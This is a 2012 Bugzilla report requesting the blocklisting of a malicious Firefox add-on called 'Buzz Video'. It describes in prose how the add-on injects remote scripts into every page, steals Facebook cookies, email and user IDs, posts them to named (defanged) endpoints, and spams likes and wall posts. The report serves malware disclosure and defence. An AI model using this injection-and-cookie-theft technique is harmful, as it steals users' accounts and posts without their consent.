Persona is no longer an option for authentication on BMO. For more details see Persona Deprecated.
Last Comment Bug 722844 - Malicious "Buzz Video" add-on
: Malicious "Buzz Video" add-on
Product: Toolkit
Classification: Components
Component: Blocklisting (show other bugs)
: unspecified
: All All
: -- normal (vote)
: ---
Assigned To: Jorge Villalobos [:jorgev]
: Jorge Villalobos [:jorgev]
Depends on:
  Show dependency treegraph
Reported: 2012-01-31 13:36 PST by MarkH
Modified: 2016-03-07 15:30 PST (History)
4 users (show)
See Also:
Crash Signature:
QA Whiteboard:
Iteration: ---
Points: ---
Has Regression Range: ---
Has STR: ---

20120131 buzz (84.48 KB, application/octet-stream)
2012-01-31 13:36 PST, MarkH
no flags Details

Description MarkH 2012-01-31 13:36:03 PST
Created attachment 593208 [details]
20120131 buzz

User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.77 Safari/535.7

Steps to reproduce:

Downloaded an add-on from http://www.nos-delires[.]com/BuzzzzVideos.xpi

Actual results:

update URL: http://www.buzzzzvideos/[.]info/update.rdf

The add-on injects youtube.js from the add-on into every page's DOM

That injects http://www.buzzzzvideos/[.]info/plugin.js

... which injects http://www.buzzzzvideos/[.]info/lolz.js?nocache


has jQuery embedded in it

grabs your Facebook cookies

Grabs your email address via and POSTs it to http://www.buzzzzvideos/[.]info/process/a.php

Posts your Facebook UID to http://www.buzzzzvideos/[.]info/process/a1.php

Grabs all of your friends via

Sends a like of Facebook page ID 267294696673364

Posts an update to your Facebook wall with one of the following URLs and mentions that you are with all of your friends.

Posts to Facebook's Open Graph ( one of the following URLs:

Expected results:

It should not steal your Facebook cookies and post to Facebook without your consent.
Comment 1 Jorge Villalobos [:jorgev] 2012-01-31 14:36:08 PST
Comment 2 Jorge Villalobos [:jorgev] 2012-01-31 14:51:31 PST

Note You need to log in before you can comment on or make changes to this bug.